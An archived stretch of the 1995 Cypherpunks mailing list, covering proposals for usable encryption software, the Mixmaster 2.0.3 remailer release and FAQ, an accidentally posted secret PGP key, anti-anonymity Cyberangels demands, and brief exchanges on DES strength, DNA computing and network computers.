Dos has small usage, and Linux provides a link map (or I can checksum entry points or such). Another fun thing to do is pkexe or gzexe. The latter turns an exe into a shell script. Patching compressed files is very difficult. zerucha at shell.portal.com -or- 2015509 on MCI Mail finger zerucha at jobe.portal.com for PGP key From JonathanZ at consensus.com Mon Nov 27 13:20:26 1995 From: JonathanZ at consensus.com (Jonathan Zamick) Date: Tue, 28 Nov 1995 05:20:26 +0800 Subject: The future will be easy to use Message-ID: At 11:06 AM 11/27/95, Raph Levien wrote: .. stuff.. >The competition for which cryptographic protocol wins will be >decided on the basis of usability. .. stuff.. > If cypherpunks are to have any hope of getting their vision of strong >crypto implemented and deployed, it has to be in the context of usable >systems. .. stuff.. > There's no way around it. This kind of system will not make it in the >big time. As I see it, any system that does must have the following >properties: > > * Some variant on the Web of Trust. > > * Online key-servers for getting keys in real time. > > * A clean mechanism for validating keys through alternate channels. > > There are three possible outcomes: we build it, the NSA builds it, or >Microsoft/Netscape builds it. This last outcome might not be so bad, but >only in the first one can we rely on our principles being advanced. This is a very important period. The technology is young enough that a window is open for a non-giant to produce a dominant product. On the other hand, it takes actual coordination of resources. I'm not sure that it is within the range of Cypherpunks to take advantage of this window. There is still no agreement whether the group can be said to have a single vision, nor whether people within it want to be bounded by another's view. 
If people really wish to take advantage of this and really push things, it means forming a group, made up of Cypherpunk members perhaps, but much smaller, and capable of working together. Also capable of handling not only the theory, but good solid code, GUI, PR, meetings, talking to the government, etc. It is an open window yes, but not a simple one. I'd love to see widespread use of secure encryption, however I don't think the potential exists within the Cypherpunk framework to reach it as 'Cypherpunks'. The question then is, whether Cypherpunks should change, or whether a smaller group will be formed. Jonathan ------------------------------------------------------------------------ ..Jonathan Zamick Consensus Development Corporation.. .. 1563 Solano Ave, #355.. .. Berkeley, CA 94707-2116.. .. o510/559-1500 f510/559-1505.. ..Mosaic/WWW Home Page: .. .. Consensus Home Page .. From mixmaster at obscura.com Mon Nov 27 13:50:32 1995 From: mixmaster at obscura.com (Mixmaster) Date: Tue, 28 Nov 1995 05:50:32 +0800 Subject: Announcement: mixmaster 2.0.3 released! Message-ID: <199511272121.NAA00088@obscura.com> Announcing the release of Mixmaster version 2.0.3 Among other improvements it includes an new and improved Makefile. Installing Mixmaster is a SNAP! For information about Mixmaster, and how to get it, check out http://obscura.com/~loki or read the Mixmaster FAQ which will be posted soon. -Lance From raph at c2.org Mon Nov 27 13:57:51 1995 From: raph at c2.org (Raph Levien) Date: Tue, 28 Nov 1995 05:57:51 +0800 Subject: The future will be easy to use In-Reply-To: Message-ID: On Mon, 27 Nov 1995, Jonathan Zamick wrote: > This is a very important period. The technology is young enough that a > window is open for a non-giant to produce a dominant product. Full agreement. > On the other hand, it takes actual coordination of resources. I'm not sure > that it is within the range of Cypherpunks to take advantage of this > window. 
There is still no agreement whether the group can be said to have a > single vision, nor whether people within it want to be bounded by another's > view. > > If people really wish to take advantage of this and really push things, it > means forming a group, made up of Cypherpunk members perhaps, but much > smaller, and capable of working together. Also capable of handling not only > the theory, but good solid code, GUI, PR, meetings, talking to the > government, etc. Right. > It is an open window yes, but not a simple one. I'd love to see widespread > use of secure encryption, however I don't think the potential exists within > the Cypherpunk framework to reach it as 'Cypherpunks'. The question then > is, whether Cypherpunks should change, or whether a smaller group will be > formed. I think that changing the focus of cypherpunks is intractable enough that forming a new group is the only feasible alternative. Right now, I don't have the time to try to form such a group, but I would be an enthusiastic participant if such a group was to be formed. Incidentally, I've had one bad experience with this type of thing (it was the PGP 3.0 development team), so I realize it's not easy. A couple of things I've learned from the experience: * Clear goals. * A leader, someone who would call the shots, and would also serve as the person you'd have to convince. * Open communications. Shrouding a project in secrecy is a good way to kill it. This is one potential advantage we have over the spooks. It _is_ doable. I know the skill is out there. Wei Dai, Eric Young, Peter Gutmann, and others have proved themselves quite capable of writing good solid code. Sameer Parekh has done an incredible job with PR. Phil Karn, Dan Bernstein, and some others (who I'm not sure want to be named) are talking to the government. GUI I'm less sure about, but I'd hope that some cpunks would come out of the woodwork. It is not a matter of ability, but of will.
Raph From JonathanZ at consensus.com Mon Nov 27 14:02:34 1995 From: JonathanZ at consensus.com (Jonathan Zamick) Date: Tue, 28 Nov 1995 06:02:34 +0800 Subject: The future will be easy to use Message-ID: >* Clear goals. > >* A leader, someone who would call the shots, and would also serve as the >person you'd have to convince. > >* Open communications. Shrouding a project in secrecy is a good way to >kill it. This is one potential advantage we have over the spooks. > >It _is_ doable. I know the skill is out there. Wei Dai, Eric Young, Peter >Gutmann, and others have proved themselves quite capable of writing good >solid code. Sameer Parekh has done an incredible job with PR. Phil Karn, >Dan Bernstein, and some others (who I'm not sure want to be named) are >talking to the government. GUI I'm less sure about, but I'd hope that some >cpunks would come out of the woodwork. > >It is not a matter of ability, but of will. It is also a matter of funding of course. While development can be donated time, the rest often takes money. Still, it's something to look into. Handling RSAREF is sapping much of my time, otherwise I'd jump right in, however I like to always pause before committing my time to endeavors. I wouldn't mind helping out though. Certainly Consensus probably has some resources with its own contacts to contribute. I agree with your points though. Another thing to consider, are some alternate methods of enterprise design that involve better communication, iteration of goals vs product, etc. (Actually I need to work on a speech about this that is coming up soon. Yet another project. :) Jonathan ------------------------------------------------------------------------ ..Jonathan Zamick Consensus Development Corporation.. .. 1563 Solano Ave, #355.. .. Berkeley, CA 94707-2116.. .. o510/559-1500 f510/559-1505.. ..Mosaic/WWW Home Page: .. .. Consensus Home Page ..
From perry at alpha.jpunix.com Mon Nov 27 14:34:56 1995 From: perry at alpha.jpunix.com (John Perry) Date: Tue, 28 Nov 1995 06:34:56 +0800 Subject: New Mixmaster Message-ID: <199511272220.QAA28147@alpha.jpunix.com> -----BEGIN PGP SIGNED MESSAGE----- Lance's new Mixmaster 2.0.3 is also available on vishnu.alias.net via the normal methods. John Perry - KG5RG - perry at alpha.jpunix.com - PGP-encrypted e-mail welcome! Packet Radio - KG5RG at WA4IMZ.#SETX.TX.USA.NA WWW - http://www.jpunix.com PGP 2.62 key for perry at jpunix.com is on the keyservers. From jgrasty at pts.mot.com Mon Nov 27 14:36:00 1995 From: jgrasty at pts.mot.com (Joey Grasty X3697 P6611) Date: Tue, 28 Nov 1995 06:36:00 +0800 Subject: Judge won't drop Netcom from suit Message-ID: <30BA3798.2781E494@pts.mot.com> Check out the story on the Scientology suit. http://www.sjmercury.com/scie1127.htm From zuhn at sctc.com Mon Nov 27 14:39:36 1995 From: zuhn at sctc.com (david d `zoo' zuhn) Date: Tue, 28 Nov 1995 06:39:36 +0800 Subject: The future will be easy to use In-Reply-To: Message-ID: <199511272224.QAA20539@spirit.sctc.com> I would posit that any "Cypherpunks" group arranged to "write the software for privacy" would rapidly get bogged down in the sorts of problems that Raph mentioned, as well as a host of others. The inter-person politics of the free software groups on the Internet are amazing (and something I like to avoid these days). On the technical side, what piece of software do we need for privacy? Well, anonymizing WWW re-servers.
Better interfaces to secure mail. Better interfaces to the anonymous remailers. Remailer-as-delivery (e.g, mailing a delivery ticket which the recipient would have to use in order to get the message from the remailer). IPsec. Reputation & certification systems. Inter-site encryption. The list goes on (and on). And then what platform do you aim for? I see the value of the cypherpunks list as a meeting point for a wide variety of folks, each of whom is likely to go off to do work in their own area, with new perspective on the values of privacy. The value of the list as a conjunction of pro-privacy folks is much greater than its value as a list where implementation of some application can be coordinated. If nothing else, the amount of work to be done is greater than that doable even if every member of the list sat down to write code full-time. Not that we couldn't get amazing things done, but... ObSpoilsporting over. Go for it, and best of luck to you. -- david d `zoo' zuhn --- secure computing corporation zuhn at sctc.com From jps at monad.semcor.com Mon Nov 27 15:14:00 1995 From: jps at monad.semcor.com (Jack P. Starrantino) Date: Tue, 28 Nov 1995 07:14:00 +0800 Subject: The future will be easy to use In-Reply-To: Message-ID: <9511272256.AA13473@monad.semcor.com> One more time for the security/cypher-impaired (me at least). I suspect there are a fair number of lurkers here who code for a living and would be willing to contribute if someone/the_group can articulate a requirements statement and then push it to the design stage. I bring nothing cypher-wise. I would be willing to help walk the s/w-engineering dog and to write Motif/X/socket if the chosen platform is UN*X, however. So, from an engineering standpoint, what should the "future" look like? jps -- Jack P. Starrantino (215) 674-0200 (voice) SEMCOR, Inc.
(215) 443-0474 (fax) 65 West Street Road jps at semcor.com Suite C-100 Warminster, PA 18974 From Greg_Rose at sydney.sterling.com Mon Nov 27 15:15:10 1995 From: Greg_Rose at sydney.sterling.com (Greg Rose) Date: Tue, 28 Nov 1995 07:15:10 +0800 Subject: establishing trust In-Reply-To: <199511270516.AAA05126@clark.net> Message-ID: Carl M. Ellison wrote: Did you intentionally not provide the same key that this was signed with? I added the key you provided, but PGP still couldn't find the right key for this signature. I think we've discovered another potential nasty. I accidentally sent out the SECRET key not the public key. I believe the problem you suffered was because it added it to secring not pubring. No I'm not going to make the passphrase public. I apologise for any inconvenience to people who added this to their secring.pgp, it was certainly not intentional on my part to do this to people. You should probably delete it. Greg. From EALLENSMITH at ocelot.Rutgers.EDU Mon Nov 27 17:24:48 1995 From: EALLENSMITH at ocelot.Rutgers.EDU (E. ALLEN SMITH) Date: Tue, 28 Nov 1995 09:24:48 +0800 Subject: Cyberangels vs Anonymnity Message-ID: <01HY5FBP59SG8WYPHF@mbcl.rutgers.edu> Here's the section from the Cyberangel FAQ which should explain why I put the addresses on the list. Given that their main tactic so far is telling ISPs, I would guess that any unauthorized remailers may be in trouble... once they get a clue enough to spot them. Yes, the shouting is theirs. -Allen _9) WHAT KINDS OF CHANGES WOULD THE GUARDIAN ANGELS / CYBERANGELS LIKE TO SEE?_ A) WE WOULD LIKE TO SEE AN IMPROVEMENT IN USER IDENTIFICATION. USER ID IS IMPOSSIBLE TO VERIFY OR TRACE BACK. THE VERY ANONYMITY OF USERS IS ITSELF CAUSING AN INCREASE IN RUDENESS, SEXUAL ABUSE, FLAMING, AND CRIMES LIKE PEDOPHILE ACTIVITY. WE THE NET USERS MUST TAKE RESPONSIBILITY FOR THE PROBLEM OURSELVES. ONE OF OUR DEMANDS IS FOR MORE ACCOUNTABLE USER IDS ON THE NET. 
WHEN PEOPLE ARE ANONYMOUS THEY ARE ALSO FREE TO BE CRIMINALS. IN A RIOT YOU SEE RIOTERS WEARING MASKS TO DISGUISE THEIR TRUE IDENTITY. THE SAME THING IS HAPPENING ONLINE. WE WOULD LIKE TO SEE USER ID MUCH MORE THOROUGHLY CHECKED BY INTERNET SERVICE PROVIDERS. ________________________________________________________________________ CYBERANGELS EMAIL ADDRESS: ANGELS at WAVENET.COM From ravage at einstein.ssz.com Mon Nov 27 17:42:17 1995 From: ravage at einstein.ssz.com (Jim Choate) Date: Tue, 28 Nov 1995 09:42:17 +0800 Subject: Meeting: Austin, TX Message-ID: <199511280130.TAA00326@einstein.ssz.com> Hi all, The Austin Cypherpunks will be meeting this Saturday from 6-8pm at Ted's Greek Restaurant on Congress between 4th and 5th. We will be taking the tables in the rear. The main topic of discussion will be the proposed 1 hour public access video on cryptography. Also we will be discussing making some form of monthly key-signing. Hope to see you there! From perry at alpha.jpunix.com Mon Nov 27 17:48:45 1995 From: perry at alpha.jpunix.com (John Perry) Date: Tue, 28 Nov 1995 09:48:45 +0800 Subject: The corrected Mixmaster Message-ID: <199511280131.TAA02826@alpha.jpunix.com> -----BEGIN PGP SIGNED MESSAGE----- The corrected mixmaster 2.0.3 is also available on vishnu.alias.net via the normal methods. I apologize for any inconvenience. John Perry - KG5RG - perry at alpha.jpunix.com - PGP-encrypted e-mail welcome! Packet Radio - KG5RG at WA4IMZ.#SETX.TX.USA.NA WWW - http://www.jpunix.com PGP 2.62 key for perry at jpunix.com is on the keyservers.
From black at sunflash.eng.usf.edu Mon Nov 27 17:54:55 1995 From: black at sunflash.eng.usf.edu (James Black) Date: Tue, 28 Nov 1995 09:54:55 +0800 Subject: The future will be easy to use In-Reply-To: <9511272256.AA13473@monad.semcor.com> Message-ID: Hello, On Mon, 27 Nov 1995, Jack P. Starrantino wrote: > I suspect there are a fair number of lurkers here who code for a living > and would be willing to contribute if someone/the_group can articulate > a requirements statement and then push it to the design stage. As soon as PGP 3.0 is released I am planning on incorporating PGP into Pine, and start putting it into more programs, to increase the usage of encryption things before they go out. I am planning on adding a chat ability to a browser, and hopefully that will be encrypted, as well. Take care and have fun. (from a lurker) ========================================================================== James Black (Comp Sci/Comp Eng sophomore) e-mail: black at eng.usf.edu http://www.eng.usf.edu/~black/index.html ************************************************************************** From nobody at REPLAY.COM Mon Nov 27 17:57:15 1995 From: nobody at REPLAY.COM (Anonymous) Date: Tue, 28 Nov 1995 09:57:15 +0800 Subject: Cray's New T3E Message-ID: <199511280140.CAA25757@utopia.hacktic.nl> WSJ, Nov 27, 1995 Cray Research to Unveil 2nd-Generation Parallel Processor for Technical Market By William M. Bulkley Cray Research Inc., bidding to reassert its dominance of high-end scientific supercomputing, is expected to unveil tomorrow a new parallel-processing supercomputer with unprecedented speed.
The Eagan, Minn., computer maker has been best-known for its multimillion-dollar vector supercomputers that use just a few very powerful processors. The new Cray T3E will be its second-generation parallel processor. Unlike its predecessor the T3D, it operates without being connected to a traditional vector supercomputer. People familiar with the machine say it will have a theoretical top speed of more than one trillion operations a second, or one teraflops, a measure of supercomputer speed. Currently the only planned teraflops machine is one that Intel Corp. is building for the Energy Department's Sandia National Laboratories. 'Back in the Game' "We look at this as evidence of Cray reasserting its franchise in the technical computing market," said Debra Goldfarb, who follows supercomputers for International Data Corp., a market research firm in Framingham, Mass. "Cray's back in the game." The smallest models are likely to be priced at well under $1 million. Buyers will be able to increase power by adding just a few processors at a time in the future making the systems "highly scalable" in industry parlance. The T3E can be built with as few as 16 processors or as many as 2,048 processors. "This reconfirms Cray's capabilities to build very efficient high-performance computers," said Philip Samper, chairman and chief executive officer, who was hired last spring. Cray has said it will report a net loss for the current year, reflecting restructuring charges as Mr. Samper cuts costs, and sales are weak as customers have been waiting for new generations of both Cray's T90 vector supercomputers and the T3E. Mr. Samper said that Cray will be profitable in the current fourth quarter on an operating basis before an expected restructuring charge, and "We expect to be profitable in 1996. That's very important for this company." Mr. Samper, who declined to discuss details of the T3E, said in an interview, "We have $100 million in orders already in house. 
When customers get so excited they put money on the line, that's the ultimate test." The T3E won't be available for sale until the end of the first quarter of 1996. Cray's total backlog was $355 million at the end of the third quarter, including orders for the T3E. Cray, the longtime leader in scientific supercomputing, faced challenges from a host of smaller companies in the late 1980s as well as three big Japanese computer makers. But with the end of the Cold War, military need for supercomputers diminished, Cray's sales plateaued and several of the smaller companies went out of business. Offsetting Some Declines Analysts estimate the high-performance-computer market at about $3 billion a year, with growth in commercial markets for large databases and video-servers for interactive-media, offsetting declines in government business. International Business Machines Corp. and Silicon Graphics Inc. have both grown rapidly by selling parallel-processing systems in those markets. Cray sells small commercial supercomputers and commercial servers for computer networks of Sun Microsystems Inc. workstations. However, analysts say it needs revenue from the high-performance scientific market to rebound. Jay P. Stevens, an analyst with Dean Witter, says sales in the current year will fall 27% to $615 million from $921.6 million. Next year he forecasts a 20% rise to $808 million. Mr. Stevens predicts a net loss before charges for 1995 of $73 million, or $1.25 a share, compared with net income of $55.7 million, or $2.32 a share, in 1994. Mr. Samper said that during the year, Cray has reduced research-and-development spending by 16% and lowered overheads. He said it plans to buy more parts from outside suppliers, and is also controlling costs by negotiating with government agencies to have them pick up certain research and support costs. ----- From perry at piermont.com Mon Nov 27 18:01:45 1995 From: perry at piermont.com (Perry E. 
Metzger) Date: Tue, 28 Nov 1995 10:01:45 +0800 Subject: Cray's New T3E In-Reply-To: <199511280140.CAA25757@utopia.hacktic.nl> Message-ID: <199511280146.UAA11393@jekyll.piermont.com> Couldn't you have just posted a pointer to this instead? Yes, we know faster computers are being built. It's not crypto-relevant, though. Sure, the NSA will buy some, but that is hardly news or interesting. Anonymous writes: > WSJ, Nov 27, 1995 > > Cray Research to Unveil 2nd-Generation Parallel Processor > for Technical Market > > By William M. Bulkley From perry at alpha.jpunix.com Mon Nov 27 18:16:13 1995 From: perry at alpha.jpunix.com (John Perry) Date: Tue, 28 Nov 1995 10:16:13 +0800 Subject: key changes for secret.alias.net Message-ID: <199511280159.TAA03326@alpha.jpunix.com> -----BEGIN PGP SIGNED MESSAGE----- Hello everyone, secret.alias.net suffered a key change when installing the new Mixmaster code. Be sure to get the new key from vishnu.alias.net via http://vishnu.alias.net/pubring.mix.html and type2.list.html. It's also available by ftp from vishnu.alias.net. John Perry - KG5RG - perry at alpha.jpunix.com - PGP-encrypted e-mail welcome! Packet Radio - KG5RG at WA4IMZ.#SETX.TX.USA.NA WWW - http://www.jpunix.com PGP 2.62 key for perry at jpunix.com is on the keyservers. From EALLENSMITH at ocelot.Rutgers.EDU Mon Nov 27 18:28:55 1995 From: EALLENSMITH at ocelot.Rutgers.EDU (E.
ALLEN SMITH) Date: Tue, 28 Nov 1995 10:28:55 +0800 Subject: Directed Hamiltonian Path Problem Message-ID: <01HY5GZFNPQO8WYPHF@mbcl.rutgers.edu> I am curious on whether there are any applications of the directed Hamiltonian path problem to cryptography, zero-knowledge proofs, etcetera. My reason for asking is that I've come across something in my field (molecular genetics) that can be used to solve such problems in a couple of weeks or so. -Allen From black at sunflash.eng.usf.edu Mon Nov 27 18:54:32 1995 From: black at sunflash.eng.usf.edu (James Black) Date: Tue, 28 Nov 1995 10:54:32 +0800 Subject: Cypherpunk Certification Authority In-Reply-To: <199511271952.LAA26633@ix3.ix.netcom.com> Message-ID: Hello, On Mon, 27 Nov 1995, Bill Stewart wrote: > Signatures often have known, or easily guessed, plaintext in them, > like the signer's name or ID number, or various header fields > such as X.509's equivalent to ----- BEGIN PGP .... If the signature is padded with random junk on the end, then it makes it harder to do a known text attack. There was a message a few days ago by Anderson and someone else (in England) that dealt with weaknesses in some encryption protocols. It was good to read. > DES isn't worthless. It's a bit weak, but not worthless. Even though he didn't have proof Bruce Schneier stated in "Applied Cryptography 2nd Ed" that the NSA might have a machine that can crack DES in 15 mins, and maybe as low as 3-5, as one was built and sold. The book can explain it more, as I am doing this from memory. Take care and have fun.
========================================================================== James Black (Comp Sci/Comp Eng sophomore) e-mail: black at eng.usf.edu http://www.eng.usf.edu/~black/index.html ************************************************************************** From mixmaster at obscura.com Mon Nov 27 18:56:05 1995 From: mixmaster at obscura.com (Mixmaster) Date: Tue, 28 Nov 1995 10:56:05 +0800 Subject: Mixmaster Remailer FAQ Message-ID: <199511280121.RAA05114@obscura.com> -----BEGIN PGP SIGNED MESSAGE----- Frequently Asked Questions about Mixmaster Remailers FAQ Version 1.7 Nov 27 1995 by Lance Cottrell This document is a semi-technical discussion of Mixmaster remailers. I wrote this to answer questions often asked by new users of Mixmaster, and to explain why you would want to use Mixmaster remailers. At the end of this FAQ is a list of currently active Mixmaster remailers. **Announcements** I am pleased to announce the release of Mixmaster 2.0.3 It contains many bug fixes, and a much improved Makefile which makes compiling a snap! **What is Mixmaster?** Mixmaster is a new class of anonymous remailers. Inspired by the existing "cypherpunk" remailers and discussions on the Cypherpunk mailing list. Mixmaster is the next generation in the evolution of remailer technology. **What is an anonymous remailer?** Quoting from Andre Bacard's remailer FAQ: An anonymous remailer (also called an "anonymous server") is a free computer service that privatizes your e-mail. A remailer allows you to send electronic mail to a Usenet news group or to a person without the recipient knowing your name or your e-mail address. For a non-technical introduction to remailers (not including Mixmaster), I recommend Andre's FAQ. It is posted regularly to: alt.privacy alt.privacy.anon-server alt.anonymous or you can get it by sending mail to: To: abacard at well.com Subject: Help1 Message: [Ignored] There is also a version on the World Wide Web.
**What do I need to use Mixmaster remailers?** Unlike other remailers, you can't just make your own message and send it to the remailer. Mixmaster's security comes in part from using a special message format. The disadvantage of this is that you need a special program to make the message for you. Once you have that program (the client) remailing is as easy as running the program, and telling it which remailers you want to use. **How do I get the Mixmaster client software?** There are two sites for distribution. The first is my machine, http://obscura.com/~loki/Welcome.html/ or ftp to obscura.com and read /pub/remail/README.no-export. The other is by anonymous ftp to jpunix.com. You will have to follow the instructions there to get Mixmaster. Because Mixmaster contains cryptography, it may not be exported from the U.S and Canada. The reason for the circuitous route to download Mixmaster is to show my good faith efforts to keep Mixmaster from being exported. I have heard rumors that someone has already broken this law, and that Mixmaster is available from Europe. I do not approve of this and will not support that site. **How do I get the software to run a Mixmaster remailer?** The remailer software is available from the same sites as the client. **But I only see one Mixmaster distribution?** The same program is used for both the client and the remailer. The only difference is in the installation. For the client you just compile it and you are ready to go. For the remailer, you need to set up mail forwarding and cron jobs. **What kinds of computers does Mixmaster run on?** Unfortunately, not PCs or Macs. But it is being ported to those right now. Mixmaster runs under UNIX. The only machine it is known not to work on is Dec Alpha. It has been tested on Linux, FreeBSD, SunOS 4.1.3, Solaris, and several others. It has been compiled and tested on Netcom. If you use it on a machine or service not on this list, please let me know so I can add it. 
**How does Mixmaster work, and why should I use it?** You should use Mixmaster if you want the highest level of anonymity available, or if you are tired of building remailer messages yourself. A discussion of how Mixmaster provides this level of security is beyond the scope of this FAQ, but I put an essay on the subject on my home page. **Does Mixmaster use PGP?** No, Mixmaster uses the rsaref package from RSA. Mixmaster uses its own keys and key file formats. To add a key to a key ring, simply append the key to your key file using your favorite text editor. **Can Mixmaster post to News?** Yes, like older remailers some Mixmaster remailers can post to news. Also like older remailers, not all Mixmaster remailers can post to news. Request the remailer's help file to check if it supports posting. Do this by sending mail to the remailer with the subject line remailer-help. **When Was Mixmaster Released?** Mixmaster was originally released on an experimental basis in late 1994. There were only ever two remailers running Mixmaster 1.0. Mixmaster 2.0 was released on May 3, 1995. There are now 18 publicly available Mixmaster remailers. **What is the latest version of Mixmaster?** Version 2.0.3 was released on Nov 27, 1995. This version uses a new Makefile, which makes compiling it a snap. Several bugs were also fixed, and some esoteric functions added. Version 2.0.2 was released on Sept 22, 1995. Mixmaster remailers can now accept messages containing multiple Mixmaster packets. Mixmaster can be told to choose a random set of remailers to chain your message through. It will now route multiple packet messages over independent chains. Several minor bugs were fixed. Version 2.0.1 was released on May 27, 1995. The only changes from 2.0 are some improvements in the documentation, and the inclusion of a more up to date list of remailers.
**What remailers run Mixmaster?** The most recent list of remailers is available on my homepage, along with the remailer list and key file for Mixmaster. You can simply replace your old files with the ones from my site to keep up to date. They are also available by ftp. Here is the current list of Mixmaster remailers. Send mail to the remailer with the subject remailer-key to retrieve the remailer's Mixmaster key.

mix        mixmaster at obscura.com
vishnu     mixmaster at vishnu.alias.net
knight     mixmaster at aldebaran.armory.com
robomix    robo at c2.org
syrinx     syrinx at c2.org
replay     remailer at replay.com
hacktic    remailer at utopia.hacktic.nl
crynwr     remailer at crynwr.com
spook      remailer at spook.alias.net
flame      remailer at flame.alias.net
Armadillo  remailer at armadillo.com
anon       mixmaster at anon.alias.net
secrets    secret at secret.alias.net
wmono      wmono at valhalla.phoenix.net
ecafe-mix  mixmaster at remail.ecafe.org
aD         anon at ad.org
shinobi    remailer at shinobi.alias.net
amnesia    amnesia at chardos.connix.com
q          q at c2.org
precipice  mixmaster at mix.precipice.com

Since this is a new FAQ, I am sure it is far from comprehensive. Watch this space for changes to the FAQ. It will be evolving rapidly for a while. Please send any questions you think should be here to: Lance Cottrell From ravage at einstein.ssz.com Mon Nov 27 19:01:56 1995 From: ravage at einstein.ssz.com (Jim Choate) Date: Tue, 28 Nov 1995 11:01:56 +0800 Subject: The future will be easy to use (fwd) Message-ID: <199511280254.UAA00156@einstein.ssz.com> Forwarded message: > Subject: Re: The future will be easy to use > From: dlv at bwalk.dm.com (Dr.
Dimitri Vulis) > Date: Mon, 27 Nov 95 21:28:05 EST > > One thing that David didn't mention is security add-ons to the "network > computers" that are supposed to be rolled out within the next few months -- > the successors to X terminals, $500 boxes with a good screen/sound, > cheap cpu, and a few megs of ram and flash memory to hold a web browser. > I expect some folks to make a good living by writing add-ons (including > crypto add-ons) to these gizmos. > Don't hold your breath. The current market surveys say that there is no market for them. Check out this weeks PC Week or Mac Week, as they both have several articles discussing this. Bottem line is that the under $1000 computer seems to have no future either in industry or the home. Realisticaly, who in their right mind would buy a diskless workstation to connect to Internet? You certainly wouldn't do crypto on it because it has to boot from somewhere else and this leaves all kinds of security holes. Also, there is the fact that at the current time there are no generaly useable apps on Internet beyond the web and most companies would rather have their employees doeing something more productive than hanging ten. Anyone who bases their business on this technology won't have a business. Take care. Jim Choate CyberTects ravage at einstein.ssz.com From jya at pipeline.com Mon Nov 27 20:15:35 1995 From: jya at pipeline.com (John Young) Date: Tue, 28 Nov 1995 12:15:35 +0800 Subject: The future will be easy to use (fwd) Message-ID: <199511280309.WAA10578@pipe3.nyc.pipeline.com> Responding to msg by ravage at einstein.ssz.com (Jim Choate) on Mon, 27 Nov 8:54 PM >Don't hold your breath. The current market surveys say >that there is no market for them. Check out this weeks >PC Week or Mac Week, as they both have several >articles discussing this. Bottem line is that the under >$1000 computer seems to have no future either in >industry or the home. 
Peter Lewis reports in today's NYT on "doubts about the fantasy of a $500 'Network PC' " but quotes Eric Schmidt of Sun saying, "They will exist and they will be very successful, and not just from Sun and Oracle. The price points are going to be pretty low, and they'll look more like consumer electronics."

Anybody want this mixed review send us a BOX_top.

From pati at ipied.tu.ac.th Mon Nov 27 20:25:50 1995
From: pati at ipied.tu.ac.th (Patiwat Panurach)
Date: Tue, 28 Nov 1995 12:25:50 +0800
Subject: Money: Back to the Future?
In-Reply-To: <199511250137.CAA12316@utopia.hacktic.nl>
Message-ID:

On Sat, 25 Nov 1995, Anonymous wrote:

> money and credit. The Eulopean system of central banks
> has produced an advisory report outlining a possible
> regulatory response, and in this countly some Fed

Does anybody know if this advisory report can be found on the net?

-------------------------------------------------------------------------------
Patiwat Panurach                  Whatever you can do, or dream you can, begin it.
eMAIL: pati at ipied.tu.ac.th    Boldness has genius, power and magic in it.
m/18 junior Fac of Economics                                -Johann W.Von Goethe
--JiuJitsu-CellularPhreaking-SukhotaiHistory-Perl-WWWDataIntegration-Puroresu--

From thad at hammerhead.com Mon Nov 27 20:31:23 1995
From: thad at hammerhead.com (Thaddeus J. Beier)
Date: Tue, 28 Nov 1995 12:31:23 +0800
Subject: Directed Hamiltonian Path Problem
Message-ID: <199511280404.UAA03020@hammerhead.com>

> I am curious on whether there are any applications of the directed
> Hamiltonian path problem to cryptography, zero-knowledge proofs, etcetera. My
> reason for asking is that I've come across something in my field (molecular
> genetics) that can be used to solve such problems in a couple of weeks or so.
> -Allen
>
>

Secret sharing can be done by Hamiltonian paths. No public key code has been found to take advantage of those, or any other NP complete problem, so far as I know.
DNA computing really doesn't solve the Hamiltonian graph problem, it just makes the biggest one that you can solve a little bit bigger. 500 point graphs remain insoluble (pun unintended) for earth-sized vats of DNA.

Really.

--
Thaddeus Beier                     email: thad at hammerhead.com
Technology Development               vox: 408) 286-3376
Hammerhead Productions               fax: 408) 292-2244

From jamesd at echeque.com Mon Nov 27 20:44:49 1995
From: jamesd at echeque.com (James A. Donald)
Date: Tue, 28 Nov 1995 12:44:49 +0800
Subject: The future will be easy to use
Message-ID: <199511280435.UAA08732@blob.best.net>

At 11:06 AM 11/27/95 -0800, Raph Levien wrote:
> As I see it, any system that does must have the following
> properties:
>
> * Some variant on the Web of Trust.
>
> * Online key-servers for getting keys in real time.
>
> * A clean mechanism for validating keys through alternate channels.
>
> There are three possible outcomes: we build it, the NSA builds it, or
> Microsoft/Netscape builds it. Specs, anyone?

I suggest a few requirements:

Store the keys, and information about the keys in a *real* database (for windows apps, we can redistribute the Microsoft access and or the paradox database engines royalty free, and drive them through ODBC to minimize dependency on specific vendors.)

Support tree of authentification: A key that is *named* Peter by Sam, or *named* Informix Corporation by the Delaware corporate registrar, shall be considered equivalent to any other key given the same name by same authority, whether that authority be Dark Unicorn, or the state of Delaware.

This last property is essential if PGP keys are to be used as a basis for exchanging promises to pay and directives to pay.

A very common use of this feature, pending the development of user friendly software that makes every man his own bank and his own credit rating agency, would be as follows:

Sam generates a long key on a clean off line computer: He uses it to name itself Sam and to name several shorter keys "Sam".
He then puts the private long key on a floppy disk and buries it in a hole in the ground along with his gold and his stash of SKS ammo, and most likely never uses it again.

He publishes the long public key, and uses the shorter private keys for actual encryption.

From time to time, he changes keys, without any disruption or inconvenience.

 ---------------------------------------------------------------------
                                       |
We have the right to defend ourselves  |   http://www.jim.com/jamesd/
and our property, because of the kind  |
of animals that we are. True law       |   James A. Donald
derives from this right, not from the  |
arbitrary power of the state.          |   jamesd at echeque.com

From ravage at einstein.ssz.com Mon Nov 27 20:59:42 1995
From: ravage at einstein.ssz.com (Jim Choate)
Date: Tue, 28 Nov 1995 12:59:42 +0800
Subject: Inexpensive Crypto Boxes...
Message-ID: <199511280454.WAA00361@einstein.ssz.com>

Hi all,

The recent discussion on the <$1000 computer/appliance/digital-widget got me to thinking and I had a spasm...

The new Sony Play Station is operating under a stripped down Unix. Considering the speed that these boxes are designed to run at it seems a natural for somebody to come up with a crypto workbench on ROM to install in one of these babies. Could program one of the game controller ports as a serial port and hook it to a Linux box (for example).

Ta ta

From torrejr at pcnet.com Mon Nov 27 21:32:06 1995
From: torrejr at pcnet.com (torrejr at pcnet.com)
Date: Tue, 28 Nov 1995 13:32:06 +0800
Subject: Cypherpunk Certification Authority
Message-ID:

So far, everybody on the net has discussed the fun part(s) of the CA issue. The techies talk about protocol, encryption ... in short the real FUN stuff. I have enjoyed diverging opinions of some of the participants. Many make excellent points and have taught me more than I ever dreamed to learn.
Lawyers are already making money and preparing for the future :-) Some lawyers argue about liabilities and drool over new laws being proposed all over the country by other lawyers to guarantee future lawsuits. Another lawyer does not believe CAs are an option and makes a good buck selling books to prove it (Electronic Commerce Law-Ben Wright squire) another publishes the American Bar Association CA liabilities, names it draft of the digital signature guidelines and goes to work for Verisign (CA? DS? UH?).

